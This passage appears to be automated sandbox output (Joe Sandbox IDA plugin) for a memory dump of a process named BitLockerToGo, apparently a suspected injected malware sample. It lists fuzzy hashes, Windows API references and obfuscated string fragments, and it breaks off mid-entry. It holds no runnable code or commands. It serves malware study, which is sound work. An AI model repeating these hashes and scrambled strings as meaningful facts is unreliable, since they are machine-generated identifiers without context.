                                                                                    • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                    • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: DCBA
                                                                                    • API String ID: 2994545307-2222620526
                                                                                    • Opcode ID: 57583cc18d04cf4ade500645237bdaea67503594d84e72236601d2668f315770
                                                                                    • Instruction ID: 64bd359bbb5b43e3422d3c833f04884c8d2da5cb65cc84172a81cef7814223a6
                                                                                    • Opcode Fuzzy Hash: 57583cc18d04cf4ade500645237bdaea67503594d84e72236601d2668f315770
                                                                                    • Instruction Fuzzy Hash: E1517C76F0062057D729AB669C5276F7242AFD8718F49413DE88A333C2DBB86D0681DE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: DCBA
                                                                                    • API String ID: 2994545307-2222620526
                                                                                    • Opcode ID: 6e7876a82558148d34286b6203d42649e56b71b1c3f8fffe3f09646100feb78f
                                                                                    • Instruction ID: e81f7f585b1284ce3ed3aa70dea4a1d59fd0da52fa85469047718e376de5e9dc
                                                                                    • Opcode Fuzzy Hash: 6e7876a82558148d34286b6203d42649e56b71b1c3f8fffe3f09646100feb78f
                                                                                    • Instruction Fuzzy Hash: B8519C75A583418BE324CF55C8507ABB6E3FFC8304F588A3EE0C997391E7B954068B5A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: [\
                                                                                    • API String ID: 0-2051771327
                                                                                    • Opcode ID: ecd83d49e737039969fc9a01a5a5ccd7361e12d91337dd1d4edd54560e481326
                                                                                    • Instruction ID: f290e286d1db89940dca0d31b2f2e558d002c586b0422b28c9512835a9c7afd1
                                                                                    • Opcode Fuzzy Hash: ecd83d49e737039969fc9a01a5a5ccd7361e12d91337dd1d4edd54560e481326
                                                                                    • Instruction Fuzzy Hash: 67414432F183505FD364CAA49CC175BFB92EBE1204F29953CE9C9A7351D2759C068B89
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: f6d8bc1427a15be6aa730dbd6b29ab38b27629d62d937c50a9299980213258e8
                                                                                    • Instruction ID: cd3a14b23a336ab25a610646b4f3d7f742152bf915ff5ca9d04d50eb20acef89
                                                                                    • Opcode Fuzzy Hash: f6d8bc1427a15be6aa730dbd6b29ab38b27629d62d937c50a9299980213258e8
                                                                                    • Instruction Fuzzy Hash: 997159367083004BC7189A28CC8176BF7D2FBD5714F1D967EE8859B391DA796C06C789
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: f123acb0fe50c215e804a0976e2544007b0a44a1c9b3f715882900abfb517b77
                                                                                    • Instruction ID: 0cd67a1d4c463cf7bb1a6f2e51dfe691ed7b3697112ccb1748d151158b469d2c
                                                                                    • Opcode Fuzzy Hash: f123acb0fe50c215e804a0976e2544007b0a44a1c9b3f715882900abfb517b77
                                                                                    • Instruction Fuzzy Hash: A56136356083119BCB149F28C891A7FB3E2FFD9350F15A92DE48597361EB34E851C789
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 165ce531d4ef642d5d1eb005d4b78d7438d0aee2ceb65d8f42d6d114adf30906
                                                                                    • Instruction ID: 8ca1db712a8936c7bbe518f80726e82080a1a7cbdad8fa7e82843f49716c0d50
                                                                                    • Opcode Fuzzy Hash: 165ce531d4ef642d5d1eb005d4b78d7438d0aee2ceb65d8f42d6d114adf30906
                                                                                    • Instruction Fuzzy Hash: E951F1706502118FDB18CF64C862B7AB7B2FF99314F09916DD0819B3A1E379C811CB89
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 903ef91e967a0d62a4c8ea8cf3112483b0a371131d01f03f766f21ce1a984c77
                                                                                    • Instruction ID: 5c657de7f26490f95fdc6555e03d0d8e02ef097c67437bfc1f9f76acc00ffa76
                                                                                    • Opcode Fuzzy Hash: 903ef91e967a0d62a4c8ea8cf3112483b0a371131d01f03f766f21ce1a984c77
                                                                                    • Instruction Fuzzy Hash: 9441AF7094C3D28BC7368F2498207BBBFE4DFA6304F0409ADC5D997242D73945468B9A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 1f5a67ce6aa6379d798783bf794e502b8216415052f7ec47ae8ae9f1f86cc681
                                                                                    • Instruction ID: 4e15c756d994f331d68d7bacd99d09935940be0335b617cdea25940d6d1f2630
                                                                                    • Opcode Fuzzy Hash: 1f5a67ce6aa6379d798783bf794e502b8216415052f7ec47ae8ae9f1f86cc681
                                                                                    • Instruction Fuzzy Hash: BA21E735A545159BDB14CF54CC42B7EB3B2FB89314F299264E411B72D8D7B9AC02CB88
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3a0276c381715b2945f99c7dc68deaacbe48c6f20340770ea694c49548a2fdaf
                                                                                    • Instruction ID: 5f0d0020cb13dd4835fa5de00ff150a82e71919640a4629c9d6ebba50eb82aa9
                                                                                    • Opcode Fuzzy Hash: 3a0276c381715b2945f99c7dc68deaacbe48c6f20340770ea694c49548a2fdaf
                                                                                    • Instruction Fuzzy Hash: 9221383239C3455FE3289F68ACC179B7693EBC7200F28953CD58597395DAB49401864A
                                                                                    APIs
                                                                                    • GetUserDefaultUILanguage.KERNELBASE ref: 00433FB6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: DefaultLanguageUser
                                                                                    • String ID:
                                                                                    • API String ID: 95929093-0
                                                                                    • Opcode ID: 0c41732d260e835f0839e037d9c9b565d1984ff467e7ab0e3f060bde0e320e6c
                                                                                    • Instruction ID: 0d691ce279b3d867aec707fb82a73fbe2ffcd24f6e30827802c13aed013c9372
                                                                                    • Opcode Fuzzy Hash: 0c41732d260e835f0839e037d9c9b565d1984ff467e7ab0e3f060bde0e320e6c
                                                                                    • Instruction Fuzzy Hash: D411C435A063848FD715CF79D894B98BFF19F5A300F0980DDD445973A2CA745A44DB22
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: BlanketProxy
                                                                                    • String ID:
                                                                                    • API String ID: 3890896728-0
                                                                                    • Opcode ID: 0acabcaa78502c44ac1aab411fb313d823a05501dc21c37f52d0377a2c5ba9e2
                                                                                    • Instruction ID: 7498a6e81cba854ca45cd9e550027e7ca15bb461db969e3b54bae00d965478ee
                                                                                    • Opcode Fuzzy Hash: 0acabcaa78502c44ac1aab411fb313d823a05501dc21c37f52d0377a2c5ba9e2
                                                                                    • Instruction Fuzzy Hash: 67F0D4B5509702CFE311DF25C56975BBBE2BBC8314F15892CE0954B290C7BAE6498FC2
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: BlanketProxy
                                                                                    • String ID:
                                                                                    • API String ID: 3890896728-0
                                                                                    • Opcode ID: 5495ae9f3699dffe42686d0c671714281ed5166f8a9f07353b7f68f6697b6f9c
                                                                                    • Instruction ID: 3da5d2467327cf97133ad7ef93917479ea0c80396110aa99869dc0165c40d563
                                                                                    • Opcode Fuzzy Hash: 5495ae9f3699dffe42686d0c671714281ed5166f8a9f07353b7f68f6697b6f9c
                                                                                    • Instruction Fuzzy Hash: C1F0B7B45093029FD311DF25C0A974BFBE5BB85308F10C91CD4954B251C7B996488FC2
                                                                                    APIs
                                                                                    • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C805
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeSecurity
                                                                                    • String ID:
                                                                                    • API String ID: 640775948-0
                                                                                    • Opcode ID: 6caf98efe57d77926b65bd171fa5ce8720511ac1d09b3f293d3c4e00846553f6
                                                                                    • Instruction ID: 73a6e0e0cb17ac8e1ad8bfc6b168bf81cb9cfa4d8bb13bcefdbdba2ddf4d7e5a
                                                                                    • Opcode Fuzzy Hash: 6caf98efe57d77926b65bd171fa5ce8720511ac1d09b3f293d3c4e00846553f6
                                                                                    • Instruction Fuzzy Hash: B9E01735BC424477F6254A08EC1BF8422029382F62F788224B315EE3E8D9A8B101810C
                                                                                    APIs
                                                                                    • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C7D3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: Initialize
                                                                                    • String ID:
                                                                                    • API String ID: 2538663250-0
                                                                                    • Opcode ID: 906862c085472af6925fb785fe073070b852232458ef7b3e4bffec18914561af
                                                                                    • Instruction ID: e692f9053c4c1add603173b24aea433b464b5ed94f4af3865707c8e1bcfb8b0d
                                                                                    • Opcode Fuzzy Hash: 906862c085472af6925fb785fe073070b852232458ef7b3e4bffec18914561af
                                                                                    • Instruction Fuzzy Hash: E2D0A731AA01446BD210A79DDC5BF563B6CD70375AF000236F2A3C66E1E9107D14D669
                                                                                    APIs
                                                                                    • RtlReAllocateHeap.NTDLL(?,00000000), ref: 00439AC2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: 6bfb9734ed57ce0f3447567262144bb0c239ecc5af525e294061333a46c12a5e
                                                                                    • Instruction ID: 195ea5378b4211f4488e35c1581176f060d5432bd187ca494063fd25216283c4
                                                                                    • Opcode Fuzzy Hash: 6bfb9734ed57ce0f3447567262144bb0c239ecc5af525e294061333a46c12a5e
                                                                                    • Instruction Fuzzy Hash: 1CB09B3514805067D5142715BC0DF8B6F24DFC5751F1012B7F2015407546655881D59C
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(?,00000000,?,?,00000000), ref: 004380BA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: dfa9bcdcf4992effd9ebc96b3b68172bd96eb1e6feaa9f1728678ead5c2ba133
                                                                                    • Instruction ID: 619cd3f0a1d579054a44b95f095a6da8aabd5bd483f4f5c16aff5eb9f323e829
                                                                                    • Opcode Fuzzy Hash: dfa9bcdcf4992effd9ebc96b3b68172bd96eb1e6feaa9f1728678ead5c2ba133
                                                                                    • Instruction Fuzzy Hash: B7B00234145515B9E57117115CD5F7F1D6CDF43E9DF600054B208180D146545442D57D
                                                                                    APIs
                                                                                    • RtlFreeHeap.NTDLL(?,00000000), ref: 004380FE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeHeap
                                                                                    • String ID:
                                                                                    • API String ID: 3298025750-0
                                                                                    • Opcode ID: e1e10fe9efff281f5ff51a9d723dbbd7af2ed098d80cef64a20feb2d9ca161ab
                                                                                    • Instruction ID: 7819ff3d06509e8342e432a01b3300ba2fcbd0b48a11999bf07549068c8c729b
                                                                                    • Opcode Fuzzy Hash: e1e10fe9efff281f5ff51a9d723dbbd7af2ed098d80cef64a20feb2d9ca161ab
                                                                                    • Instruction Fuzzy Hash: 61B01234085010AAD5103B11BC0DFCB7F10EF45311F0140E2B200640B287615841C9CC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $ $"$$$%$%$&$+$+$.$.$.$3$4$A$A$A$A$A$A$B$B$B$B$B$B$C$C$C$C$C$C$D$D$D$D$D$D$D$D$H$H$H$J$K$K$L$L$P$P$Q$Q$T$Y$Z$[$\$`$a$a$c$c$d$e$e$g$i$k$l$m$o$o$p$p$r$r$r$r$s$t$v$v$x$z$|$~$~
                                                                                    • API String ID: 0-1347705104
                                                                                    • Opcode ID: fef2ae686b8e8c6acf6d92a36c27e622645ddadac221ef3b137f30e792adf8bd
                                                                                    • Instruction ID: 5247b736cec1ace8f2ead6485fecf5c8bb33a1d48f45eef8b81bfa453b640866
                                                                                    • Opcode Fuzzy Hash: fef2ae686b8e8c6acf6d92a36c27e622645ddadac221ef3b137f30e792adf8bd
                                                                                    • Instruction Fuzzy Hash: E8139D3160C7C18AD334CB38C44539FBBE1ABD6324F188A6EE4D9873D2D6B989858757
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: $$+$3$4$>$A$A$B$C$D$DABCD$O$P$U$V$Z$`$h
                                                                                    • API String ID: 2994545307-175843415
                                                                                    • Opcode ID: 08891286ca56ec213cebd68c08deb92daf5d7b8f3604174f7b55971068ff1ac9
                                                                                    • Instruction ID: 483331af4594b857fe0ce6079c8881b492f380997123de76c7c70a9bde850424
                                                                                    • Opcode Fuzzy Hash: 08891286ca56ec213cebd68c08deb92daf5d7b8f3604174f7b55971068ff1ac9
                                                                                    • Instruction Fuzzy Hash: 2982C57160C7808BD3249B38C4953AFBBE2ABD5314F198A3EE5D9873D1D6788885CB47
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: NV[K$UAPS$UXWZ$VM$VQlJ$h$mtwz$n$rrip$tYCZ
                                                                                    • API String ID: 0-3331790720
                                                                                    • Opcode ID: 23847872f2627ba97969ec9efbc11b36efa7c93efb836e547c5bc3453f7e3632
                                                                                    • Instruction ID: 7741a0428823d80e118f5df9010b1c44a856e0838fbdef6cf153a24b4129b43b
                                                                                    • Opcode Fuzzy Hash: 23847872f2627ba97969ec9efbc11b36efa7c93efb836e547c5bc3453f7e3632
                                                                                    • Instruction Fuzzy Hash: 0381E0B150D3E18BE331CF25A0907ABBFE1AB96340F28496DC5DD5B342C7791805CB9A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: *$"*$*$"*$/$34$\iPe$dINO$j|$vq$wy
                                                                                    • API String ID: 0-2503078089
                                                                                    • Opcode ID: bcf6e07e8729db145a630841b2436792e2e9d57967a13fccd60a43c16f6ba714
                                                                                    • Instruction ID: 0a748ab88c072d9ecacf6db472457a042bc4677918580400a89f79172a34eab1
                                                                                    • Opcode Fuzzy Hash: bcf6e07e8729db145a630841b2436792e2e9d57967a13fccd60a43c16f6ba714
                                                                                    • Instruction Fuzzy Hash: 6EC108716083408FD718DF65C8916AFBBE2EBC2314F14893DF4D19B392D639960ACB56
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: C>X0$D$D"A$$J6EH$MN$P&@8$]*N,$^:B<$xYw[
                                                                                    • API String ID: 0-3292156457
                                                                                    • Opcode ID: c6d5bb265bdb93c89c28a49cddbc124b38db168f9fe5d0d1307b72b25f450001
                                                                                    • Instruction ID: ad70754358f75f96f89e5d5f4c9addb1857235af53de9c673c40fbd92a9384dd
                                                                                    • Opcode Fuzzy Hash: c6d5bb265bdb93c89c28a49cddbc124b38db168f9fe5d0d1307b72b25f450001
                                                                                    • Instruction Fuzzy Hash: 43917AB0108340CFD3248F14C4A1BABBBF1FF86359F458A5DE4894F2A1E3798946CB5A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: DCBA$DCBA$DCBA$[\$5Zl$5Zl$Z\$^P
                                                                                    • API String ID: 2994545307-3151724278
                                                                                    • Opcode ID: ab693a78d0b19306fe809804e87f005d828ab756b41879f79a1b5e553287b66c
                                                                                    • Instruction ID: 30ab7f929d8a07dc3d8873c68d2278d649e136490da9de6a5d43bf32cd8d4692
                                                                                    • Opcode Fuzzy Hash: ab693a78d0b19306fe809804e87f005d828ab756b41879f79a1b5e553287b66c
                                                                                    • Instruction Fuzzy Hash: 1892A8316493409BD720CF64C8857AFB7E2FBD5300F18856EE5859B391D3B99C82CB9A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: L$d"d$$l2r4$m:i<$|&t8$Z\$^P
                                                                                    • API String ID: 0-1724584702
                                                                                    • Opcode ID: fb70b4c9c05101007d508a61fb3708714a996244607e1c5ef3b49211955d8373
                                                                                    • Instruction ID: 2a9502ae1b22e79b802cbd78b7a1b8f54dc075db748f69bc6e5fa1cfc8ef5e0c
                                                                                    • Opcode Fuzzy Hash: fb70b4c9c05101007d508a61fb3708714a996244607e1c5ef3b49211955d8373
                                                                                    • Instruction Fuzzy Hash: 0F6134B29093908BD335CF5684923EBBAE2EBD9304F58892DC4CD6B355D7384552CB8B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LGHI$ec}y$fp~f$jdkb$jk$CIE
                                                                                    • API String ID: 0-1801165453
                                                                                    • Opcode ID: bcc18b650d6663702cff9dae8dad8c9ea42bcf290737524e91fd9fa945319b3e
                                                                                    • Instruction ID: f7a6e3dff254edd297ad885eaa72bead2b20a4844f05c981639e4c953a739855
                                                                                    • Opcode Fuzzy Hash: bcc18b650d6663702cff9dae8dad8c9ea42bcf290737524e91fd9fa945319b3e
                                                                                    • Instruction Fuzzy Hash: 62C1E27524C3508BC324DF2584516AFFBE3ABC2304F19897DE4D56F386D67988168B8B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: \}$kl$u$z\R6$|~
                                                                                    • API String ID: 0-839039025
                                                                                    • Opcode ID: 61e48381633d6ac082315ab95e76aadf48114a4cc7cad988b7e374e2d1fe872f
                                                                                    • Instruction ID: d376f31ca106a3e18cae543faef04638516657012839f8bd0dc1c3cc62336a40
                                                                                    • Opcode Fuzzy Hash: 61e48381633d6ac082315ab95e76aadf48114a4cc7cad988b7e374e2d1fe872f
                                                                                    • Instruction Fuzzy Hash: 9D7114716083A18FD335CF38C8917ABBBD1EB96304F18896DD4C98B342D77949498B96
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $&=",$)${yrs
                                                                                    • API String ID: 0-1254945749
                                                                                    • Opcode ID: d40627908e96dda92a4d965530751face9949d40852ba6946d5ffca92c465dbb
                                                                                    • Instruction ID: 81033180e824efb6238312a03b4fd97b2519aaf2c39ab56ec81eecc0e62b379a
                                                                                    • Opcode Fuzzy Hash: d40627908e96dda92a4d965530751face9949d40852ba6946d5ffca92c465dbb
                                                                                    • Instruction Fuzzy Hash: EB52367590C3908FC725CF25C8807AFBBE1AF96304F08856EE8D55B392D739894ACB56
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: +[J;$DCBA$DCBA$f
                                                                                    • API String ID: 2994545307-979426530
                                                                                    • Opcode ID: b779821aa48d1f537e0a5818c19115795b1aac73c8baaf1e0f495c05489447a5
                                                                                    • Instruction ID: 6e64e34dcd31ac6d1c56d3237c8ca23546036134a602b87600847ab7c5b3d5d6
                                                                                    • Opcode Fuzzy Hash: b779821aa48d1f537e0a5818c19115795b1aac73c8baaf1e0f495c05489447a5
                                                                                    • Instruction Fuzzy Hash: A912F3716083418BC718CF29C89072BB7E2FBD9314F189A6EF49597391DB79ED018B86
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: DCBA$DCBA$DCBA$DCBA
                                                                                    • API String ID: 0-1380943437
                                                                                    • Opcode ID: 1fad232efbf2104744d23570844e905b283685d5ef7122856a7b502bd80bc565
                                                                                    • Instruction ID: db2459913d76577c8d131428bae0f0046f550a55b2fe272ecb3189ba83e80acf
                                                                                    • Opcode Fuzzy Hash: 1fad232efbf2104744d23570844e905b283685d5ef7122856a7b502bd80bc565
                                                                                    • Instruction Fuzzy Hash: 6AC113316083119BD710DF50C881B2BF7E2EB89714F16A97EE98567382D7799C018BAA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: A$B$C$D
                                                                                    • API String ID: 0-483099237
                                                                                    • Opcode ID: 7faefb273461f8ec36540b997c0022dc4d909690a7191f3854a272fe84b1f62d
                                                                                    • Instruction ID: e225b5a330cc60262ecc9cc9b93cb77643b4512128a0f7ea36a7fe259bee2e2d
                                                                                    • Opcode Fuzzy Hash: 7faefb273461f8ec36540b997c0022dc4d909690a7191f3854a272fe84b1f62d
                                                                                    • Instruction Fuzzy Hash: 52126E2050CBD2DED722C73C8458349BF917B67324F088388D1E55BBD2C3A9A965C7E6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ",*"$%!+!$1<7n$jrj-
                                                                                    • API String ID: 0-1366688494
                                                                                    • Opcode ID: c6c5228e0b3d99bb4fe49e8e5f77b92791fa7544ae884492db604a47cca9ae8e
                                                                                    • Instruction ID: cbffaeedfb35219c005300c1b01725cc43cf78952604f74f2e29baaef4c71618
